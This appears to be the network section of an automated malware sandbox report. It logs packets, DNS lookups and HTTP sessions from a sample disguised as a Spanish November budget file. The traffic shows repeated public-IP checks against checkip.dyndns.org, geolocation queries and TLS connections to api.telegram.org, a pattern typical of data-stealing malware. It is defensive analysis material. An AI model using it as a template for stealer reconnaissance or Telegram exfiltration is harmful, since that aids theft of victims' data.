                                                                                            Oct 31, 2024 10:35:24.941660881 CET44349819188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.941858053 CET44349819188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.941939116 CET49819443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:24.942356110 CET49819443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:24.945422888 CET4981580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:24.946532011 CET4982380192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:24.950973034 CET8049815132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.951045036 CET4981580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:24.951581955 CET8049823132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.951653004 CET4982380192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:24.951780081 CET4982380192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:24.956608057 CET8049823132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:25.833621025 CET8049823132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:25.835006952 CET49828443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:25.835047960 CET44349828188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:25.835118055 CET49828443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:25.835381985 CET49828443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:25.835391998 CET44349828188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:25.884637117 CET4982380192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:26.442466974 CET44349828188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:26.449470997 CET49828443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:26.449492931 CET44349828188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:26.585117102 CET44349828188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:26.585226059 CET44349828188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:26.585335016 CET49828443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:26.585944891 CET49828443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:26.589154959 CET4982380192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:26.590646982 CET4983480192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:26.594641924 CET8049823132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:26.594750881 CET4982380192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:26.596002102 CET8049834132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:26.596107006 CET4983480192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:26.596254110 CET4983480192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:26.601059914 CET8049834132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:29.487379074 CET8049834132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:29.488847017 CET49850443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:29.488892078 CET44349850188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:29.488986015 CET49850443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:29.489233971 CET49850443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:29.489252090 CET44349850188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:29.540864944 CET4983480192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:30.096824884 CET44349850188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:30.098556042 CET49850443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:30.098586082 CET44349850188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:30.241353035 CET44349850188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:30.241480112 CET44349850188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:30.241631031 CET49850443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:30.242188931 CET49850443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:30.248794079 CET4983480192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:30.249855042 CET4985580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:30.254390955 CET8049834132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:30.255352020 CET8049855132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:30.255542040 CET4983480192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:30.255584002 CET4985580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:30.255770922 CET4985580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:30.260598898 CET8049855132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.142432928 CET8049855132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.143851995 CET49861443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:31.143894911 CET44349861188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.143996954 CET49861443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:31.144232988 CET49861443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:31.144247055 CET44349861188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.197222948 CET4985580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:31.782111883 CET44349861188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.837723970 CET49861443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:31.840131998 CET49861443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:31.840142012 CET44349861188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.983668089 CET44349861188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.983769894 CET44349861188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:31.983823061 CET49861443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:31.984245062 CET49861443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:31.997438908 CET4985580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:31.998209953 CET4986780192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:32.003717899 CET8049855132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:32.003731966 CET8049867132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:32.003783941 CET4985580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:32.003844023 CET4986780192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:32.003972054 CET4986780192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:32.008954048 CET8049867132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:32.869249105 CET8049867132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:32.870671988 CET49871443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:32.870716095 CET44349871188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:32.870798111 CET49871443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:32.871063948 CET49871443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:32.871078968 CET44349871188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:32.915966034 CET4986780192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:33.484709024 CET44349871188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:33.486357927 CET49871443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:33.486406088 CET44349871188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:33.624177933 CET44349871188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:33.624308109 CET44349871188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:33.624391079 CET49871443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:33.625116110 CET49871443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:33.640129089 CET4986780192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:33.646862030 CET8049867132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:33.646939993 CET4986780192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:33.648881912 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:33.648936033 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:33.649032116 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:33.649418116 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:33.649434090 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:34.496447086 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:34.496573925 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:34.525892019 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:34.525930882 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:34.526192904 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:34.539478064 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:34.587327003 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:34.782130957 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:34.782201052 CET44349877149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:34.782273054 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:34.787276030 CET49877443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:40.826353073 CET49913443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:40.826391935 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:40.826494932 CET49913443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:40.826715946 CET49913443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:40.826728106 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:41.690464020 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:41.692264080 CET49913443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:41.692284107 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:41.692369938 CET49913443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:41.692378044 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:42.007913113 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:42.056467056 CET49913443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:42.056479931 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:42.056843042 CET49913443192.168.2.11149.154.167.220
                                                                                            Oct 31, 2024 10:35:42.056931973 CET44349913149.154.167.220192.168.2.11
                                                                                            Oct 31, 2024 10:35:42.056987047 CET49913443192.168.2.11149.154.167.220
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 31, 2024 10:35:02.271914005 CET5032453192.168.2.111.1.1.1
                                                                                            Oct 31, 2024 10:35:02.757272959 CET53503241.1.1.1192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.141781092 CET6330653192.168.2.111.1.1.1
                                                                                            Oct 31, 2024 10:35:17.150319099 CET53633061.1.1.1192.168.2.11
                                                                                            Oct 31, 2024 10:35:30.308347940 CET5793053192.168.2.111.1.1.1
                                                                                            Oct 31, 2024 10:35:30.315867901 CET53579301.1.1.1192.168.2.11
                                                                                            Oct 31, 2024 10:35:33.640820026 CET5813953192.168.2.111.1.1.1
                                                                                            Oct 31, 2024 10:35:33.648272991 CET53581391.1.1.1192.168.2.11
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 31, 2024 10:35:02.271914005 CET192.168.2.111.1.1.10xb79cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:17.141781092 CET192.168.2.111.1.1.10x85bfStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:30.308347940 CET192.168.2.111.1.1.10xfacdStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:33.640820026 CET192.168.2.111.1.1.10x6f0cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 31, 2024 10:35:02.757272959 CET1.1.1.1192.168.2.110xb79cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:02.757272959 CET1.1.1.1192.168.2.110xb79cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:02.757272959 CET1.1.1.1192.168.2.110xb79cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:02.757272959 CET1.1.1.1192.168.2.110xb79cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:02.757272959 CET1.1.1.1192.168.2.110xb79cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:02.757272959 CET1.1.1.1192.168.2.110xb79cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:17.150319099 CET1.1.1.1192.168.2.110x85bfNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:17.150319099 CET1.1.1.1192.168.2.110x85bfNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:30.315867901 CET1.1.1.1192.168.2.110xfacdNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:30.315867901 CET1.1.1.1192.168.2.110xfacdNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Oct 31, 2024 10:35:33.648272991 CET1.1.1.1192.168.2.110x6f0cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                            • reallyfreegeoip.org
                                                                                            • api.telegram.org
                                                                                            • checkip.dyndns.org
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.1149708132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:02.771111965 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 31, 2024 10:35:12.773505926 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:12 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
                                                                                            Oct 31, 2024 10:35:12.778711081 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 31, 2024 10:35:13.087740898 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 31, 2024 10:35:13.697173119 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 31, 2024 10:35:13.828908920 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:12 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
                                                                                            Oct 31, 2024 10:35:13.828936100 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:12 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
                                                                                            Oct 31, 2024 10:35:13.829416990 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:12 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: cdcb59fa0c1b89d1d1ed101497e29b08
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
                                                                                            Oct 31, 2024 10:35:17.018172026 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:16 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 58e96fcf4fbc1b7c345eb9fee32a8b4f
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
                                                                                            Oct 31, 2024 10:35:18.046241999 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 31, 2024 10:35:18.300370932 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:18 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: dbbeb45ad4a0f935c73b72926c919f25
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.1149786132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:19.070328951 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 31, 2024 10:35:19.945801973 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:19 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 2c57c59497f38ff66f3de88da78002ff
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.1149798132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:20.715481997 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 31, 2024 10:35:22.567306042 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:22 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: bfb7323370e377169645cb851e2acc5c
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.1149815132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:23.336566925 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 31, 2024 10:35:24.189604044 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:24 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: b74019ff47732ef02bad8b7b8689feea
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.1149823132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:24.951780081 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 31, 2024 10:35:25.833621025 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:25 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 279e19e17ca8258be0071c780ff03cf9
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.1149834132.226.247.73807336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 31, 2024 10:35:26.596254110 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 31, 2024 10:35:29.487379074 CET323INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:29 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
